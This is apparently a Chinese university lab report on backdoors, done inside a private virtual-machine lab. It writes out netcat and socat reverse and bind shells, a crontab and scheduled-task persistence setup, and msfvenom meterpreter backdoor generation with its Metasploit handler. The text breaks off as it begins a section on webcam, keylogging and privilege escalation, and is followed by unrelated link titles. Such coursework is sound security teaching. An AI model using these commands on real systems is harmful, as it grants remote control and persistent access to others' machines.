Exp2 后门原理与实践 20164309
? 准备工作:使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130 ? ? 实验内容? 一、使用nc或netcat远程获取shell(1)win获得Linux shell1.windows打开监听进入文件夹 cd netcat
开始监听 ncat.exe -l -p 4309
这里的 -l 是监听模式,-p是选择监听的端口。 2. Linux反弹连接winnc 192.168.236.130 4309 -e /bin/sh
? 3.windows下获得一个linux shell,可运行任何cmd指令,如ls(2) Linux获得Win Shell1.Linux运行监听指令nc -l -p 4309
2.Windows反弹连接Linuxncat.exe -e cmd.exe 192.168.236.131 4309
? 3.Linux下看到Windows的命令提示可以发现,linux端获得了win的shell ? (3) nc传输数据1.在win端对4309端口进行监听ncat.exe -l -p 4309
2.linux端连接到win端4309端口nc 192.168.236.130 4309
3.传输通道建立,可以传输文字信息了? 二、使用netcat获取主机操作Shell,cron启动1.在Win端进行监听ncat.exe -l -p 4309
?2.使用crontab指令增加一条定时任务crontab-e
3.添加指令令其定时反向连接在最后添加一条定时连接win端口的指令 56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh
表示每小时的第56分钟连接IP为192.168.236.130的主机(即虚拟机win7端)的4309端口,具体时间可以自行设定,我这里为了方便选择了两分钟之后的时间 稍等片刻,发现成功获取win端的shell 三、使用socat获取主机操作Shell,任务计划启动1.新建一个能运行socat的任务?①搜索任务计划程序,点击进入? ②点击右侧操作里的创建任务,并命名为“20164309 socat”③新建触发器,设定为在锁定时触发? ③新建操作,选定目标程序路径,并且添加参数:tcp-listen:4309 exec:cmd.exe,pty,stderr
这个命令可以将cmd.exe绑定到4309端口,并且将cmd.exe的stderr重定向到stdout上 ? ?我们可以看到,创建任务成功 2.触发任务,使其运行使用Windows+l锁定主机后,再解锁,发现程序已经运行 3.获取shellsocat - tcp:192.168.236.130:4309
这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的4309端口。 在实现的时候我出现了一个问题:在tcp后多打了一个空格,卡了很久,不过好在成功了,大家引以为戒。 修改后发现已经成功获取cmd Shell: 四、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell1.生成后门在linux端使用msfvenom工具,生成后门: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131
其中-p 使用的payload,为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反弹回连的IP,即攻击机linux的IP地址,LPORT是回连的端口,-f是生成文件的类型, >输出到哪个文件 由于一开始没有充分理解这里的ip地址的意义,我使用了被攻击win端的地址,导致在之后使用后门的时候屡屡失败。经过理解我发现这里的ip是被攻击主机需要连接的地址,即为攻击机linux端的地址。 2. 使用nc进行文件传输需要在win端关闭杀软和防火墙的条件下进行 ①在win端进行监听ncat.exe -lv 4309 > 20164309_backdoor.exe
其中-lv表示可以观察到连接状态 ? ?②在linux端传输文件nc 192.168.236.130 4309 < 20164309_backdoor.exe发送文件
在win端命令行显示传输成功 的确传输成功了 ?3.在msf端控制台设置反弹回连输入 msfconsole
进入控制台(之后由于实验屡次失败我进入了这个界面不知道多少次。。。幸亏这里有一个小彩蛋,每次进入的界面大都和之前不一样,也算是苦中作乐了吧) use exploit/multi/handler
设置payload set payload windows/meterpreter/reverse_tcp
使用生成后门程序时相同的payload set LHOST 192.168.236.131
这里需要与生成后门程序的主机IP相同 set LPORT 4309
需要使用相同的端口 show options
显示选项 exploit
进行监听 屡次尝试,在纠正了刚刚说的那个错误后在win端运行了正确的后门 发现可以调用win端shell 五、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权还有很多功能可以使用,我们一个一个试试吧 1.使用
|
- 未能在Windows 7上创建高程COM对象
- 如何使用本机Win32 API从聚焦窗口中获取所选文本?
- 【SoloPi】SoloPi使用1-初次使用,环境准备(Windows版)
- win7 python pdf2image入坑经历
- windows-server-2008 – 我可以在Windows 2003服务器上安装
- windows-phone-7 – 将存储在隔离存储中的图像绑定到Window
- 通过Powershell或Batch将文件从Windows转换为UNIX
- windows-server-2008 – 在Windows Server 2008上禁用UAC的
- windows-server-2008 – Windows Server 2008上的管理工具中
- 什么是显示磁盘使用情况的好工具(适用于Windows)?